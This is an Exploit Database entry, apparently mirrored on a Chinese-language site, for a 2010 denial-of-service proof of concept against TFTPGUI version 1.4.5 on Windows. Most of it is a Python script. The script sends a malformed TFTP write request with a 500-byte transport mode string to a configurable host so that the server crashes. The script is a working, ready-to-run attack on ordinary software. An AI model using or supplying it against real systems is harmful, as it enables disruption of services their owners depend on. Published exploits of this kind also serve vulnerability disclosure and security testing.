TFTPGUI – Long Transport Mode Overflow

• Exploit Database
• 10 阅读

• 作者： Jeremiah Talamantes
  日期： 2010-05-02
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12482/

• # Exploit Title: TFTPGUI Long Transport Mode Overflow
  # Date: 5/1/2010
  # Author: Jeremiah Talamantes
  # Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
  # Version: 1.4.5
  # Tested on: Windows XP, SP2 (En)
  # CVE : N/A
  
  #!/usr/bin/python
  print "\n#################################################################"
  print "##RedTeam Security ##"
  print "## TFTPGUI Long Transport Mode Overflow##"
  print "##Version 1.4.5##"
  print "##LIST Vulnerability ##"
  print "## ##"
  print "## Jeremiah Talamantes ##"
  print "## labs@redteamsecure.com##"
  print "################################################################# \n"
  
  import socket
  import sys
  
  # Change these values to suit your needs
  host = '192.168.1.108'
  port = 69
   
  try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  except:
   print "Error: unable to connect."
   sys.exit(1)
   
  # Creating the overly long transport mode string 
  fn = "A"
  md = "A" * 500
  stuff = "\x00\x02" + fn + "\0" + md + "\0"
  
  # Send data
  s.sendto(stuff, (host, port))
  print "Check to see if TFTPGUI is still running..."
  
  # End